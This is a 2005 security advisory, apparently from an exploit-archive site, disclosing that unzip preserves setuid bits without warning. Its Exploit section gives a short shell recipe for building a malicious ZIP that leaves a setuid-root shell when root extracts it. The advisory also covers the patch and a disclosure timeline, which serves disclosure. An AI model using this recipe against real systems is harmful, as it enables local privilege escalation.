7a69ezine Advisory 22

7a69ezine Advisory 22: Posted Feb 28, 2005; Authored by 7a69ezine | Site 7a69ezine.org; 7a69ezine Advisory - unzip will extract setuid files from an archive without warning a user when doing so. This is probably a poor design flaw but not necessarily unexpected.; tags | advisory; SHA-256 | 1981687fe5c134656a0f5955327324772c0eee91afb2f0243da5051cb6ba2c0f; Download | Favorite | View

7a69ezine Advisory 22

- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#22
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [26/01/2005]
- ------------------------------------------------------------------

Title:        Unzip keep setuid and setgid files

Author:       Albert Puigsech Galicia - <ripe@7a69ezine.org>

Software:     Unzip

Versions:     >= 5.51

Remote:       No

Exploit:      yes

Severity:     Low/Medium

- ------------------------------------------------------------------



I. Introduction.

 UnZip is an extraction utility for archives compressed in .zip format. It's 
compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary 
objectives have been portability and non-MSDOS fuctionality. More info about 
unzip on http://www.info-zip.org/pub/infozip/UnZip.html.



II. Description.

 The unzip UNIX functionality allow you to maintain file permisions into 
compressed files, and of course that includes the setuid bit. Because it does 
not show a warning message before unpacking a setuid file is posible to create
a malicious ZIP file that creates an executable setuid.



III. Exploit

 It's realy easy to test this vulnerability. You can create a malicious ZIP 
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh


 When another user (including root) unpacks the file, a setuid shell file will 
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive:  malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh


 Of course ye need a local account on the system to execute the file, so it's 
not a remote vulnerability.




IV. Patch

  Upgrade to unzip 5.52.
 

V. Timeline

12/01/2005  -  Bug discovered
16/01/2005  -  Vendor contacted
21/01/2005  -  Vendor response
25/01/2005  -  Vendor patch provided
28/02/2005  -  New versión published
28/02/2005  -  Advisor published



VI. Extra data

 You can find more 7a69ezine advisories on this following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

7a69ezine Advisory 22

7a69ezine Advisory 22

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

7a69ezine Advisory 22

Share This

7a69ezine Advisory 22

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems